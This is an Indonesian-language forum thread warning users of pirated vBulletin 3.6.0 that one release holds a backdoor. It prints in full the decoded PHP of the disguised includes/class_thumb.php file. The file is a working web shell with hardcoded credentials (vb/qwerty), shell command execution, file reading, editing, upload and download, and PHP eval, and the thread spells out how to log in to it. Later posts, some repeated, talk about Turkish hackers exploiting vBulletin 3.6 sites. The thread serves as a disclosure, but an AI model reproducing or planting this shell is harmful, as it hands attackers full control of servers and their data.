Ati2 buat yang pake versi null... dari 2 perilis :
DGT - ada backdoor di validator.php nya!

SCRiPTMAFiA (sedih gwe.. pemilik SCRiPTMAFiA adalah temen baek gw di ProjectW /sob)
Nih Info gw dapet dari Russian Forum dan UDAH dibenarkan oleh temen gwe... dia bilang ini sbagai salam perpisahan (/swt) buat temen2 nya...

/includes/class_thumb.php
Setela di Decode
<?php
/*================================================= =====================*\
|| ################################################## ################## ||
|| # vBulletin 3.6.0 - Licence Number $sm_lickey
|| # ---------------------------------------------------------------- # ||
|| # Copyright c2000-2006 Jelsoft Enterprises Ltd.
<br/>SEO by <a rel="nofollow" href="http://www.crawlability.com/vbseo/">vBSEO</a> 2.4.0 All Rights Reserved. ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # Регистрация | Регистрация # ||
|| ################################################## ################## ||
\*================================================ ======================*/

$version = "3.6.0";
$vsplit = "style=\"border-right: #000000 1px solid;\"";
$hsplit = "style=\"border-bottom: #000000 1px solid;\"";


$login='vb';
$hash='b1b3773a05c0ed0176787a4f1574ff0075f7521e'; // sha1("qwerty")

if(!((@$_SERVER["PHP_AUTH_USER"]===$login)&&(sha1(@$_SERVER["PHP_AUTH_PW"])===$hash)))
{
header("WWW-Authenticate: Basic");
header("HTTP/1.0 401 Unauthorized");
die();
}

function cmd($s)
{ return `$s`;}
function safe_mode_is_on()
{ return !ereg("drmist", cmd("echo drmist"));}

function edit($size, $name, $val)
{ return "<input class=\"ed\" type=text size=$size name=$name value=\"$val\">"; }
function button($capt)
{ return "<input type=submit value=\"$capt\">"; }
function hidden($name, $val)
{ return "<input type=hidden name=$name value=\"$val\">"; }
function hidden_pwd()
{ global $location; return hidden("pwd",$location);}

if(version_compare(phpversion(),"4.1.0") == -1)
{ $_POST=&$HTTP_POST_VARS; }
if(@get_magic_quotes_gpc())
foreach ($_POST as $k=>$v)
{ $_POST[$k] = stripslashes($v); }

$action_edit = false;

$printline = "";

if(isset($_POST["action"])) $action = $_POST["action"];
else $action = "cmd";

if(isset($_POST["pwd"]))
{ $pwd = $_POST["pwd"]; $type = filetype($pwd); if($type === "dir")chdir($pwd); else $printline = "\"$pwd\" - no such directory."; }

$location = getcwd();

if(($action === "download")&&(isset($_POST["fname"])))
{
$fname = $_POST["fname"];
if(file_exists($fname))
{
$pathinfo = pathinfo($fname);
header("Content-Transfer-Encoding: binary");
header("Content-type: application/x-download");
header("Content-Length: ".filesize($fname));
header("Content-Disposition: attachment; filename=".$pathinfo["basename"]);
@readfile($fname);
die();
}
else
$printline = "\"$fname\" - download failed.";
}

echo "<head><style>input {border: black 1px solid; background-color:#cfcfcf; font: 8pt verdana;}
textarea {background-color:#dfdfdf; scrollbar-face-color: #dfdfdf; scrollbar-highlight-color: #dfdfdf;
scrollbar-shadow-color: #dfdfdf; scrollbar-3dlight-color: #dfdfdf; scrollbar-arrow-color: #dfdfdf; scrollbar-track-color: #dfdfdf;
scrollbar-darkshadow-color: #dfdfdf; border: black 1px solid; font: fixedsys bold; }
td {padding:0} .ed{background-color: #dfdfdf;} body {margin: 0; padding: 0; background-color: #cfcfcf;} a {color:black;text-decoration:none}
</style><title>vBulletin - Debug v$version</title></head><body><table width=100%>
<tr><td $hsplit><table><tr><td $vsplit><b>vB Debug v$version&nbsp;</b></td><td>id: ".cmd("id")."<br>uname: ".cmd("uname -a")."<br>your ip: ".$_SERVER["REMOTE_ADDR"]." - server ip: ".gethostbyname($_SERVER["HTTP_HOST"])." - safe_mode: ".((safe_mode_is_on()) ? "on" : "off")."</td></tr></table></tr></td>
<tr><td colspan=2 $hsplit><center><form method=post>".hidden("action","save").hidden_pwd() ."<textarea cols=120 rows=16 wrap=off name=data>";

echo htmlspecialchars($printline)."\n";

if($action === "cmd")
{
if(isset($_POST["cmd"]))
$cmd = $_POST["cmd"];
else
$cmd = "ls -la";

$result = htmlspecialchars(cmd($cmd));

if($result === "")
$result = cmd("ls -la");

echo $result;
$location = getcwd();
}
elseif(($action === "edit")&&(isset($_POST["fname"])))
{
$fname = $_POST["fname"];
ob_start();

if(!@readfile($fname))
echo "Cann't open file \"$fname\".";
else
$action_edit = true;

$result = ob_get_clean();
@ob_end_clean();
echo htmlspecialchars($result);
}
elseif(($action === "save")&&(isset($_POST["fname"]))&&(isset($_POST["data"])))
{
$fname = $_POST["fname"];
$data = $_POST["data"];
$fid = @fopen($fname, "w");
$fname = htmlspecialchars($fname);

if(!$fid)
echo "Cann't save file \"$fname\".";
else
{
fputs($fid, $data);
fclose($fid);
echo "File \"$fname\" is saved.";
}
}
elseif(($action === "upload")&&(isset($_FILES["file"]))&&(isset($_POST["fname"])))
{
$fname = $_POST["fname"];
if(copy($_FILES["file"]["tmp_name"], $fname))
echo "File \"$fname\" is uploaded.\nFile size: ".filesize($fname)." bytes.";
else
echo "Upload failed!";
}
elseif(($action === "eval")&&(isset($_POST["code"])))
{
$code = $_POST["code"];
ob_start();
@eval($code);
$result = ob_get_clean();
@ob_end_clean();
echo htmlspecialchars($result);
}

echo "</textarea>".(($action_edit) ? "<br>".button(" Save ").hidden("fname",$fname) : "")."</form></center></td></tr>
<tr><td $hsplit><center><form method=post>".hidden("action","cmd")."<table><tr>< td width=80>Command:&nbsp;</td><td>".edit(85,"cmd","")."</td></tr><tr><td>Location:&nbsp;</td><td>".edit(85,"pwd",$location)."&nbsp;".button( "Execute")."</td></tr></table></form></center></td></tr>
<tr><td $hsplit><center><form method=post>".hidden("action","edit").hidden_pwd() ."<table><tr><td width=80>Edit file:</td><td>".edit(85,"fname",$location)."</td><td>".button(" Edit ")."</td></table></form></center></td></tr>

<tr><td $hsplit><table width=100%><tr><td width=50% $vsplit>
<form method=post>".hidden("action","download").hidden_p wd()."<center><table><tr><td width=80>File:</td><td>".edit(50,"fname",$location)."</td><td>".button("Download")."</td></tr></table></center></form>
</td><td width=50%>
<form method=post enctype=multipart/form-data>".hidden("action","upload").hidden_pwd()."<ce nter><table><tr><td width=80>File:</td><td><input class=\"ed\" type=file size=50 name=file></td></tr><tr><td>To file:</td><td>".edit(50,"fname",$location)."&nbsp;".butto n("Upload")."</td></tr></table></center></form>
</td></tr></table></td></tr>

<tr><td $hsplit><form method=post>".hidden("action","eval").hidden_pwd() ."<center><textarea cols=100 rows=4 wrap=off name=code></textarea><br>".button(" Eval ")."</center></form></td></tr>
<tr><td align=right>Copyright &copy;2000 - 2006 Jelsoft Enterprises Limited. All rights reserved.</td></tr></table></body>";

/*================================================= =====================*\
|| ################################################## ##################
|| # Downloaded: $sm_time, $sm_date
|| # CVS: $RCSfile: attachment.php,v $ - $Revision: 1.176 $
|| ################################################## ##################
\*================================================ ======================*/
?>
Type Регистрация
Then input vb:qwerty and you can upload files to the host!

/swt /swt /swt

Kembali gw benar kan ..
Sialan ..
Publish ..
Gyahahahahaha ..

Kalau kamu perhatikan banyak website down dr kemarin ..
Di hack in sama orang Turkey .. Dan kesemuannya adalah pengguna vBulletin 3.6 (Bahkan paid version) ..
Kenapa?!
Well .. Ada exploit yang working di Nulled and Paid version of vBulletin 3.6 ..

Exploitnya apa?
Kayaknya yang paid lom release yah??
So .. Let it be .. xD~~
Maybe next time yah ke release nya .. Hahaha

Thanks.
Th0R

Kembali gw benar kan ..
Sialan ..
Publish ..
Gyahahahahaha ..

Kalau kamu perhatikan banyak website down dr kemarin ..
Di hack in sama orang Turkey .. Dan kesemuannya adalah pengguna vBulletin 3.6 (Bahkan paid version) ..
Kenapa?!
Well .. Ada exploit yang working di Nulled and Paid version of vBulletin 3.6 ..

Exploitnya apa?
Kayaknya yang paid lom release yah??
So .. Let it be .. xD~~
Maybe next time yah ke release nya .. Hahaha

Thanks.
Th0R
ekekeke....... gw jujur aja baru tau... /swt setelah ada IP iseng di Forum gwe /swt

berita bantahannya ada disini

SCRiPTMAFiA 3.6 gold WARNING!!!
http://www.projectw.org/viewtopic.php?t=316166&highlight=vbulletin&sid=2dbcf6aaed65cd3bb4f35c639b9023e3

btw, vB 3.6.1 mana yah. kok blum ada yang posting. ;))

berita bantahannya ada disini

SCRiPTMAFiA 3.6 gold WARNING!!!
http://www.projectw.org/viewtopic.php?t=316166&highlight=vbulletin&sid=2dbcf6aaed65cd3bb4f35c639b9023e3

btw, vB 3.6.1 mana yah. kok blum ada yang posting. ;))
wew pemaen PW juga.. lam kenal boz... /kis /kis